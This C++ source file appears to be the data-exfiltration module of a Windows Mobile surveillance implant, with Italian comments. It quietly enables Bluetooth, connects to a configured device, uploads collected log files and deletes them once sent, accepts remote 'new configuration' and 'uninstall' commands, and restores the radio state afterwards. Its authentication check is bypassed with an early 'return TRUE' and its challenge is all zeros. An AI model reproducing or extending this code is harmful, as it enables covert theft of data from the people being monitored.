#include <exception>
using namespace std;

#include "Transfer.h"
#include "Status.h"

DEFINE_GUID(TCP_PROTOCOL_UUID,    0x00000004, 0x0000, 0x1000, 0x80, 0x00, 0x00, 0x80, 0x5F, 0x9B, 0x34, 0xFB);

BOOL Transfer::ActivateBT() {
	DWORD dwRadioMode = 0;

	BthGetMode(&dwRadioMode);

	if(bIsBtAlreadyActive && dwRadioMode == BTH_POWER_OFF){
		bIsBtAlreadyActive = FALSE;
		bIsBtActive = FALSE;
	}

	switch(dwRadioMode){
		case BTH_CONNECTABLE:
		case BTH_DISCOVERABLE:
			bIsBtAlreadyActive = TRUE;
			break;

		default:
			bIsBtAlreadyActive = FALSE;
			BthSetMode(BTH_CONNECTABLE);
			BthGetMode(&dwRadioMode);
			break;
	}

	if(dwRadioMode == BTH_POWER_OFF)
			return FALSE;

	bIsBtActive = TRUE;
	return bIsBtActive;
}

BOOL Transfer::DeActivateBT() {
	DWORD dwRadioMode = 0;

	BthGetMode(&dwRadioMode);

	if(dwRadioMode == BTH_POWER_OFF){
		bIsBtActive = FALSE;
		return TRUE;
	}

	if(bIsBtAlreadyActive)
		return TRUE;

	BthSetMode(BTH_POWER_OFF);
	BthGetMode(&dwRadioMode);

	if(dwRadioMode != BTH_POWER_OFF){
		bIsBtActive = TRUE;
		return FALSE;
	}

	bIsBtActive = FALSE;
	return TRUE;
}

BOOL Transfer::ActivateWiFi() {
	throw "Not yet implemented";
}

BOOL Transfer::DeActivateWiFi() {
	throw "Not yet implemented";
}

BOOL Transfer::SetBTPin(UCHAR *pPin, UINT uLen) {
	if(pPin == NULL || uLen == 0 || uLen > 16)
		return FALSE;

	memset(BtPin, 0x00, 16);
	memcpy(BtPin, pPin, uLen);
	return TRUE;
}

BOOL Transfer::IsInternetConnectionAvailable() {
	throw "Not yet implemented";
}

void Transfer::MiniSleep(UINT delay) {
	throw "Not yet implemented";
}

UINT Transfer::Send(UINT Type) {
	SOCKET localSocket;
	DWORD dwData, dwRead = 0;
	BYTE *pData = NULL;

	switch(Type){
		case CONF_SYNC_BT:
			localSocket = BTSocket;
			break;
	
		case CONF_SYNC_WIFI:
			localSocket = wifiSocket;
			break;

		case CONF_SYNC_INTERNET:
			localSocket = internetSocket;
			break;

		default: 
			localSocket = INVALID_SOCKET;
			break;
	}

	if(localSocket == INVALID_SOCKET || localSocket == SOCKET_ERROR)
		return FALSE;

	/* A quanto pare... Niente timeout sui socket BT di windows! 
	// Settiamo il timeout
	tv.tv_sec = 30;
	tv.tv_usec = 0;

	if(setsockopt(localSocket, SOL_SOCKET, SO_RCVTIMEO, (CHAR *)&err, sizeof(err)) == SOCKET_ERROR){
		// Niente timeout ma non e' un errore critico;
		//return FALSE;
	}

	if(setsockopt(localSocket, SOL_SOCKET, SO_SNDTIMEO, (CHAR *)&tv, sizeof(tv)) == SOCKET_ERROR){
		// Niente timeout ma non e' un errore critico;
		//return FALSE;
	}
	*/

	// Primo step del protocollo (CHALLENGE)
	if(SendChallenge(localSocket) == FALSE){
		SendCommand(localSocket, PROTO_BYE);
		return FALSE;
	}

	// Secondo step, controlliamo il response
	if(CheckResponse(localSocket) == FALSE){
		SendCommand(localSocket, PROTO_BYE);
		return FALSE;
	}

	if(SendCommand(localSocket, PROTO_OK) == SOCKET_ERROR)
		return FALSE;

	// Terzo step, riceviamo il challenge dal server
	if(GetChallenge(localSocket) == FALSE) {
		SendCommand(localSocket, PROTO_BYE);
		return FALSE;
	}

	// Attendiamo l'OK dal server
	if(RecvCommand(localSocket) != PROTO_OK)
		return FALSE;

	/* QUI FINISCE LA PARTE DI GESTIONE DEL CHALLENGE RESPONSE */

	while(1) {
		/* RICEVIAMO LA NUOVA CONFIGURAZIONE O EVENTUALI COMANDI */
		if((dwData = RecvCommand(localSocket)) == SOCKET_ERROR) {
			SendCommand(localSocket, PROTO_BYE);
			return FALSE;
		}

		switch(dwData) {
			case PROTO_SYNC: 	/* PARTIAMO CON LA SYNC */
				if(Sync(localSocket) == FALSE){
					SendCommand(localSocket, PROTO_BYE);
					return FALSE;
				}
				break;

			case PROTO_NEW_CONF:
				return FALSE;

			case PROTO_UNINSTALL:
				return FALSE;

			default:
				return FALSE;
		}
	}



	/* SALUTIAMO IL SERVER */
	SendCommand(localSocket, PROTO_BYE);

	return TRUE;
}

BYTE* Transfer::Recv(UINT* len) {
	throw "Not yet implemented";
}

BOOL Transfer::Close(UINT type) {
	throw "Not yet implemented";
}

BOOL Transfer::SendChallenge(SOCKET s) {
	UINT uCommand;
	INT ret;

	if(s == NULL)
		return FALSE;

	// Generiamo 16 byte casuali
	// Rand() etc etc e li copiamo in Challenge
	memset(Challenge, 0x00, sizeof(Challenge));

	// Spediamo il CHALLENGE command
	uCommand = PROTO_CHALLENGE;
	ret = send(s, (CHAR *)&uCommand, sizeof(UINT), 0);

	if(ret == SOCKET_ERROR || ret < sizeof(UINT)){
		ret = GetLastError();
		return FALSE;
	}

	// E poi spediamo il challenge
	ret = send(s, (CHAR *)Challenge, sizeof(Challenge), 0);

	if(ret == SOCKET_ERROR || ret < sizeof(Challenge))
		return FALSE;

	return TRUE;
}

BOOL Transfer::CheckResponse(SOCKET s) {
	BYTE Response[16];
	UINT uCommand = 0;
	INT ret;

	if(s == NULL)
		return FALSE;

	// Riceviamo il comando di response
	ret = recv(s, (CHAR *)&uCommand, sizeof(UINT), 0);

	if(ret == SOCKET_ERROR || ret < sizeof(UINT) || ret == 0)
		return FALSE;

	// Accettiamo solo un proto response a questo punto
	if(uCommand != PROTO_RESPONSE)
		return FALSE;

	// Riceviamo il response vero e proprio
	ret = recv(s, (CHAR *)&Response, sizeof(Response), 0);

	if(ret == SOCKET_ERROR || ret < sizeof(UINT) || ret == 0)
		return FALSE;

// XXXXXXXXXXXXXXXXX Abilitare!
return TRUE;

	// Prendiamo i byte, li decifriamo con AES e controlliamo che siano uguali a Challenge
	if(memcmp(Response, Challenge, sizeof(Challenge)))
		return FALSE;

	return TRUE;
}

BOOL Transfer::GetChallenge(SOCKET s) {
	BYTE uChallenge[16];
	UINT uCommand = 0;
	INT ret;

	if(s == NULL)
		return FALSE;

	// Riceviamo il comando di response
	ret = recv(s, (CHAR *)&uCommand, sizeof(UINT), 0);

	if(ret == SOCKET_ERROR || ret < sizeof(UINT) || ret == 0)
		return FALSE;

	// Accettiamo solo un proto challenge a questo punto
	if(uCommand != PROTO_CHALLENGE)
		return FALSE;

	// Riceviamo il challenge vero e proprio
	ret = recv(s, (CHAR *)&uChallenge, sizeof(uChallenge), 0);

	if(ret == SOCKET_ERROR || ret < sizeof(UINT) || ret == 0)
		return FALSE;

	// Cifriamolo con AES usando la chiave e spediamolo
	// AES....

	// Spediamo il RESPONSE command
	uCommand = PROTO_RESPONSE;
	ret = send(s, (CHAR *)&uCommand, sizeof(UINT), 0);

	if(ret == SOCKET_ERROR || ret < sizeof(UINT))
		return FALSE;

	// E poi spediamo il response
	ret = send(s, (CHAR *)&uChallenge, sizeof(uChallenge), 0);

	if(ret == SOCKET_ERROR || ret < sizeof(uChallenge))
		return FALSE;

	return TRUE;
}

BOOL Transfer::Sync(SOCKET s) {
#define SAFE_EXIT(x)	if(pData) \
						delete[] pData; \
						if(hFile != INVALID_HANDLE_VALUE) \
						CloseHandle(hFile); \
						return x;

	BYTE *pData = NULL;
	list<WCHAR *>::iterator iter;
	UINT uCommand = 0, logNum, dwSize, dwRead = 0, dwBuf[2];
	HANDLE hFile;

	if(s == NULL)
		return FALSE;

	// Log viene cancellato dal distruttore di Transfer e da Task
	pSnap = log->GetLogSnapshot();

	if(pSnap == NULL)
		return FALSE;

	logNum = pSnap->size();

	// Diciamo al server quanti log stiamo per spedire
	dwBuf[0] = PROTO_LOG_NUM;
	dwBuf[1] = logNum;

	if(SendData(s, (BYTE *)&dwBuf, sizeof(dwBuf)) == SOCKET_ERROR)
		return FALSE;

	// Attendiamo l'OK dal server
	if(RecvCommand(s) != PROTO_OK)
		return FALSE;

	for(iter = pSnap->begin(); iter != pSnap->end(); iter++){
		PWCHAR wName = GetCurrentPath(*iter);

		if(wName == NULL)
			return FALSE;

		hFile = CreateFile(wName, GENERIC_READ, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);

		delete[] wName;

		if(hFile == INVALID_HANDLE_VALUE)
			continue;

		dwSize = GetFileSize(hFile, NULL);

		if(dwSize == 0){
			CloseHandle(hFile);
			continue;
		}

		// LOG,# di bytes
		dwBuf[0] = PROTO_LOG;
		dwBuf[1] = dwSize;

		if(SendData(s, (BYTE *)&dwBuf, sizeof(dwBuf)) == SOCKET_ERROR) {
			SAFE_EXIT(FALSE);
		}
		
		// Attendiamo l'OK dal server
		if(RecvCommand(s) != PROTO_OK) {
			SAFE_EXIT(FALSE);
		}

		// Spediamo il log
		pData = new(std::nothrow) BYTE[dwSize];

		if(pData == NULL) {
			SAFE_EXIT(FALSE);
		}

		if(!ReadFile(hFile, pData, dwSize, (DWORD *)&dwRead, NULL)){
			CloseHandle(hFile);
			delete[] pData;
			pData = NULL;
			continue;
		}

		CloseHandle(hFile);

		if(SendData(s, pData, dwRead) == SOCKET_ERROR) {
			SAFE_EXIT(FALSE);
		}

		// Attendiamo l'OK dal server
		if(RecvCommand(s) != PROTO_OK) {
			SAFE_EXIT(FALSE);
		}

		delete[] pData;
		pData = NULL;
		log->RemoveLog(*iter);
	}

	return TRUE;
}

BOOL Transfer::SetBTMacAddress(UINT64 uMacAddress) {
	if(uMacAddress == 0)
		return FALSE;

	uBtMac = uMacAddress;

	return TRUE;
}

BOOL Transfer::SetWifiMacAddress(UINT pMacAddress) {
	throw "Not yet implemented";
}

BOOL Transfer::SetWifiSSID(WCHAR* pSSID) {
	throw "Not yet implemented";
}

BOOL Transfer::SetWifiKey(BYTE* pKey, UINT len, UINT type) {
	throw "Not yet implemented";
}

Transfer::Transfer() : bIsBtActive(FALSE), bIsWifiActive(FALSE), bIsBtAlreadyActive(FALSE), 
bIsWifiAlreadyActive(FALSE), uBtMac(0), retryTimes(0), pollInterval(0), pSnap(NULL), log(NULL){
	statusObj = Status::self();

	memset(BtPin, 0x00, sizeof(BtPin));
	memset(Challenge, 0x00, sizeof(Challenge));
}

Transfer::~Transfer() {
	if(log)
		delete log;
}

INT Transfer::Poll(UINT type) {
	throw "Not yet implemented";
}

UINT Transfer::BtSend() {
	WSADATA wsd;
	list<ConfStruct *> *conf = NULL;
	list<ConfStruct *>::iterator iter;
	SOCKADDR_BTH sab;
	BTH_SOCKOPT_SECURITY bss;
	UINT poll, times, i;
	INT ret;

	if(statusObj == FALSE)
		return FALSE;

	ZeroMemory(&sab, sizeof(SOCKADDR_BTH));
	ZeroMemory(&bss, sizeof(BTH_SOCKOPT_SECURITY));

	WAIT_AND_SIGNAL(statusObj->bConfigLock);
	conf = statusObj->GetConfigStruct();

	if(conf == NULL){
		UNLOCK(statusObj->bConfigLock);
		return FALSE;
	}

	for(iter = conf->begin(); iter != conf->end(); iter++){
		switch((*iter)->uConfId){
			case CONFIGURATION_BTMAC: 
				SetBTMacAddress(*(BT_ADDR *)((*iter)->pParams));
				break;
			case CONFIGURATION_BTPIN:
				SetBTPin((UCHAR *)((*iter)->pParams), (*iter)->uParamLength);
				break;
			case CONFIGURATION_CONNRETRY:
				poll = *(UINT *)((*iter)->pParams);
				times = *(UINT *)((BYTE *)(*iter)->pParams + 4);
				SetPollInterval(poll, times);
				break;
			default: break;
		}
	}
	UNLOCK(statusObj->bConfigLock);
	
	sab.btAddr = uBtMac;
	sab.addressFamily = AF_BTH;
	sab.port = 6 & 0xff; // 6 e' il canale da utilizzare
	//sab.serviceClassId = TCP_PROTOCOL_UUID;
	bss.btAddr = uBtMac;
	bss.iLength = strlen((CHAR *)BtPin);
	memcpy((CHAR *)bss.caData, (CHAR *)BtPin, strlen((CHAR *)BtPin));

	if(WSAStartup(MAKEWORD(1,0),&wsd) != 0)
		return FALSE;

	if(ActivateBT() == FALSE){
		WSACleanup();
		return FALSE;
	}

	BTSocket = socket(AF_BTH, SOCK_STREAM, BTHPROTO_RFCOMM);

	if(BTSocket == INVALID_SOCKET){
		DeActivateBT();
		WSACleanup();
		return FALSE;
	}

	if(strlen((CHAR *)BtPin)){
		if(setsockopt(BTSocket, SOL_RFCOMM, SO_BTH_SET_PIN , (CHAR *)&bss, sizeof(bss)) == SOCKET_ERROR){
			DeActivateBT();
			closesocket(BTSocket);
			WSACleanup();
			return FALSE;
		}

		INT encryption = TRUE;
		if(setsockopt(BTSocket, SOL_RFCOMM, SO_BTH_ENCRYPT , (CHAR *)&encryption, sizeof(encryption)) == SOCKET_ERROR){
			DeActivateBT();
			closesocket(BTSocket);
			WSACleanup();
			return FALSE;
		}
	}

	// Connect loop
	i = 0;
	while(i < retryTimes){
		ret = connect(BTSocket, (const sockaddr *)&sab, sizeof(sab));

		if(ret) {
			int err = GetLastError();
			Sleep(pollInterval);
			i++;
			continue;
		}

		break;
	}

	// Non si riesce a connettere, torniamo con un errore
	if(ret) {
		DeActivateBT();
		closesocket(BTSocket);
		WSACleanup();
		return FALSE;
	}

	// Send loop
	i = 0;
	while(i < retryTimes){
		if(Send(CONF_SYNC_BT) == TRUE){
			DeActivateBT();
			closesocket(BTSocket);
			WSACleanup();
			return TRUE;
		} else {
			Sleep(pollInterval);
			i++;
			continue;
		}
	}

	DeActivateBT();
	closesocket(BTSocket);
	WSACleanup();
	return FALSE;
}

UINT Transfer::WiFiSend() {
	throw "Not yet implemented";
}

UINT Transfer::InternetSend() {
	throw "Not yet implemented";
}

BOOL Transfer::SetPollInterval(UINT uPoll, UINT uTimes) {
	pollInterval = uPoll;
	retryTimes = uTimes;

	if(pollInterval == 0)
		pollInterval = 1000;

	return TRUE;
}

INT Transfer::SendData(SOCKET s, BYTE *pData, UINT Len) {
	INT ret, offset;
	CHAR *tmp = NULL;

	if(s == NULL || s == INVALID_SOCKET || pData == NULL)
		return SOCKET_ERROR;

	if(Len == 0)
		return 0;

	tmp = (CHAR *)pData;
	offset = 0;
	ret = 0;

	while((UINT)ret < Len - offset) {
		ret = send(s, tmp, Len - offset, 0);

		if(ret == SOCKET_ERROR)
			return SOCKET_ERROR;

		if((UINT)ret < Len - offset) {
			tmp += ret;
			offset += ret;
		} 
	}

	return ret;
}

INT Transfer::RecvData(SOCKET s, BYTE *pData, UINT Len) {
	INT ret;
	CHAR *tmp = NULL;
	
	if(s == NULL || s == INVALID_SOCKET || pData == NULL || Len == 0)
		return SOCKET_ERROR;

	ret = recv(s, (CHAR *)pData, Len, 0);

	if(ret == 0){
		return SOCKET_ERROR;
	}

	if(ret == SOCKET_ERROR) {
		ret = WSAGetLastError();

		if(ret == WSAEMSGSIZE)
			return ret;

		return SOCKET_ERROR;
	}

	return ret;
}

INT Transfer::SendCommand(SOCKET s, UINT uCommand) {
	INT ret, offset;
	CHAR *tmp = NULL;

	if(s == NULL || s == INVALID_SOCKET || uCommand == INVALID_COMMAND)
		return SOCKET_ERROR;

	tmp = (CHAR *)&uCommand;
	offset = 0;
	ret = 0;

	while((UINT)ret < sizeof(uCommand) - offset) {
		ret = send(s, tmp, sizeof(uCommand), 0);

		if(ret == SOCKET_ERROR)
			return ret;

		if((UINT)ret < sizeof(uCommand) - offset) {
			tmp += ret;
			offset += ret;
		} 
	}

	return ret;
}

INT Transfer::RecvCommand(SOCKET s) {
	INT ret;
	CHAR *tmp = NULL;
	UINT uData;

	if(s == NULL || s == INVALID_SOCKET)
		return SOCKET_ERROR;

	ret = recv(s, (CHAR *)&uData, sizeof(uData), 0);

	if(ret == 0 || ret == SOCKET_ERROR){
		return SOCKET_ERROR;
	}

	return uData;
}